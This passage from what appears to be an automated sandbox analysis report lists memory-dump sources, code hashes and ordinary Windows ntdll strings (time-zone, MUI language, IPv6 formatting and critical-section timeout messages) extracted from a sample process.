                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                  • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                  • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                  • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                  • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                  • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                  • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                  • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                  • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                  • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                  • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                  • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                  • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                  • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                  • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                  • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                  • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                  • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                  • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                  • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                  • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                  • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • Kernel-MUI-Language-SKU, xrefs: 007589FC
                                  • Kernel-MUI-Number-Allowed, xrefs: 007587E6
                                  • WindowsExcludedProcs, xrefs: 007587C1
                                  • Kernel-MUI-Language-Allowed, xrefs: 00758827
                                  • Kernel-MUI-Language-Disallowed, xrefs: 00758914
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: _wcspbrk
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 402402107-258546922
                                  • Opcode ID: a167312b6b4213007bb782e31a2330bf927fa09dad8f62f4225cc884200cffac
                                  • Instruction ID: 0a2a6bccf57b74669135fc915fec59ba5444a59e5f638f92d9dfc0a2d4a0b0b9
                                  • Opcode Fuzzy Hash: a167312b6b4213007bb782e31a2330bf927fa09dad8f62f4225cc884200cffac
                                  • Instruction Fuzzy Hash: 34F115B2D00209EFDF51DF94C985DEEB7B8FF08301F14446AE905A7211EB78AA45DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: _wcsnlen
                                  • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                  • API String ID: 3628947076-1387797911
                                  • Opcode ID: 45a8b8d171f889cc70c24fd5bd6995d95b7b6813f3ca3df15b22deb4b2b4fd66
                                  • Instruction ID: 1f8624bbf28ab91affbf77502756dff77c890b3d05ab19b9db422aaed68dd23d
                                  • Opcode Fuzzy Hash: 45a8b8d171f889cc70c24fd5bd6995d95b7b6813f3ca3df15b22deb4b2b4fd66
                                  • Instruction Fuzzy Hash: 2D41D871340249FBEB029A91CC46FDF77ACAF05B44F24412EBA10D6191DBB8DB00C7A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 59c23085ba10354ed0dbefd77a867b06506bf85c047e00b519c9bda4d0c4d4ad
                                  • Instruction ID: a592f67da5e6c95447368361a62582baff0230017c4683c62d1ce5317f2ce97e
                                  • Opcode Fuzzy Hash: 59c23085ba10354ed0dbefd77a867b06506bf85c047e00b519c9bda4d0c4d4ad
                                  • Instruction Fuzzy Hash: A96137B1900655EADF34CF5DC8808BE7BB5EF94300B94C52DF99A47641D27CAA40CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 630ab70d112e57bdb7f76a482d2b70629c8713a65bf5c2105032cc45ca60427c
                                  • Instruction ID: b02a3f6a37ec503a258dbe205155a7e9da450b2c8fa5387403bddc89279d946c
                                  • Opcode Fuzzy Hash: 630ab70d112e57bdb7f76a482d2b70629c8713a65bf5c2105032cc45ca60427c
                                  • Instruction Fuzzy Hash: FD61A6B2910648ABDB20DF69C84147E7BF5EF54311B14C52AF8ADA7241E278EF409B72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00783F12
                                  Strings
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 0078E345
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0078E2FB
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00783F75
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00783EC4
                                  • ExecuteOptions, xrefs: 00783F04
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00783F4A
                                  • Execute=1, xrefs: 00783F5E
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: BaseDataModuleQuery
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 3901378454-484625025
                                  • Opcode ID: 8c3e7fdc5723d0e96eb76f8360080767cb1f7082ea6d171203cbb11717abd005
                                  • Instruction ID: 30286a2fc8b3622a829d088f6c0825a0d86035c3761885e44a4e3d126e91a33d
                                  • Opcode Fuzzy Hash: 8c3e7fdc5723d0e96eb76f8360080767cb1f7082ea6d171203cbb11717abd005
                                  • Instruction Fuzzy Hash: 2641AD7168061CFADB20AE54DCCAFDA73BCAF54714F000595B605E6092EB789B46CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: __fassign
                                  • String ID: .$:$:
                                  • API String ID: 3965848254-2308638275
                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                  • Instruction ID: d5d01b3d71e993e05c5a94f67dae0f804c7ecfa9f38d3ef88ee363e3ccdcc407
                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                  • Instruction Fuzzy Hash: 79A19D7190030AEFCF25CF64C8556FEB7B4AF15384F24C56AD84AA7282D6389A41CBE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00792206
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-4236105082
                                  • Opcode ID: ea8b125d9ef6c6a1f81b7a30b86e1f31ecab890a4025023f15d43038b9ceb4d1
                                  • Instruction ID: fbe174005d69523103c40687462872883b2a849454bbf419938160b7b3bbf122
                                  • Opcode Fuzzy Hash: ea8b125d9ef6c6a1f81b7a30b86e1f31ecab890a4025023f15d43038b9ceb4d1
                                  • Instruction Fuzzy Hash: AD514B75740205BBEF14EB18DC85FA673A9AF94710F218229FD48DB287D969EC4287D0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ___swprintf_l.LIBCMT ref: 0079EA22
                                    • Part of subcall function 007713CB: ___swprintf_l.LIBCMT ref: 0077146B
                                    • Part of subcall function 007713CB: ___swprintf_l.LIBCMT ref: 00771490
                                  • ___swprintf_l.LIBCMT ref: 0077156D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: c95d9cebe4ec59ca1efadec51e05ad87c3db3f5432c1afbd5dbe1d25774b1219
                                  • Instruction ID: d3a778ee60efaa949fd91bc014b9dfe59e3c424b9fb95e479ac8a1f065700a8e
                                  • Opcode Fuzzy Hash: c95d9cebe4ec59ca1efadec51e05ad87c3db3f5432c1afbd5dbe1d25774b1219
                                  • Instruction Fuzzy Hash: F721C1B29006199BDF24DE68DC45AEE73ACEB50740F848151FD4AD3141EB78AA688BE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 74617fcbfa08c9a4f29d527634afd56ccac22082a7eb57c9708f23474936827b
                                  • Instruction ID: 29eec9e24567eb303c6f7147d9f79d7054caa961e8e7e1879f0427c415745506
                                  • Opcode Fuzzy Hash: 74617fcbfa08c9a4f29d527634afd56ccac22082a7eb57c9708f23474936827b
                                  • Instruction Fuzzy Hash: 5E2171B290022AABDB10AE659C459EF77BDAF18714F040526FD0497282E7B89F54C7E2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007922F4
                                  Strings
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 007922FC
                                  • RTL: Resource at %p, xrefs: 0079230B
                                  • RTL: Re-Waiting, xrefs: 00792328
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-871070163
                                  • Opcode ID: 176a540a19378ff52b2f9e19780f0a3f78eadc503e5092e143d51d0303dcb6fa
                                  • Instruction ID: 617c8ec89938efa80c4a1cb6ff93843e3e6c22bb7d26e354bf558c5284d7d131
                                  • Opcode Fuzzy Hash: 176a540a19378ff52b2f9e19780f0a3f78eadc503e5092e143d51d0303dcb6fa
                                  • Instruction Fuzzy Hash: BD513B71600701BBDF10AB28DC85FE67398AF55764F114229FD08DB282E6A9ED468790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 007924BD
                                  • RTL: Re-Waiting, xrefs: 007924FA
                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0079248D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
